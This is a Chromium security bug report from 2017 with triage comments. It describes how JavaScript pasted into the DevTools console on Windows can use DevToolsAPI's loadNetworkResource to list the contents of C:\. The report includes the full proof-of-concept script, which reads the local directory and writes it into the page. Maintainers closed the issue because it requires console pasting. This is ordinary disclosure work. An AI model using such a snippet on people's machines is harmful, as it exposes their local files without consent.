Security: chrome-devtools protocol allows to read the content of C:\ drive via console.log()
Reported by chromium...@gmail.com, Jan 2 2017
Issue description
VERSION
Chrome Version: 57.0.2969.1 canary + stable
Operating System: Windows 7
REPRODUCTION CASE
1. Navigate to chrome-devtools://devtools/remote/serve_rev/@199588/devtools.htm
2. Open developer tools.
3. Enter:
function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof window.parent.DevToolsHost == "undefined" )
setTimeout('window.parent.location.reload()', 100) ;
else
setTimeout('f()', 100) ;
Jan 3 2017
Is there a way to exploit this without pasting the malicious script into devtools? Exploitation in that scenario is fairly unlikely (at least when coupled with the navigation), and there are already a number of troubling things an attacker can do if they can convince a user to paste a script into devtools.
Jan 3 2017
I agree with #3. We don't usually consider anything which requires console evaluation as a security issue, since it's impossible to guard against misusing privileged devtools.
Jan 4 2017
Closing this as per #3 and #5. chromium.khalil@, if you manage to exploit this without opening devtools, please report a new bug.
Apr 12 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by chromium...@gmail.com, Jan 2 2017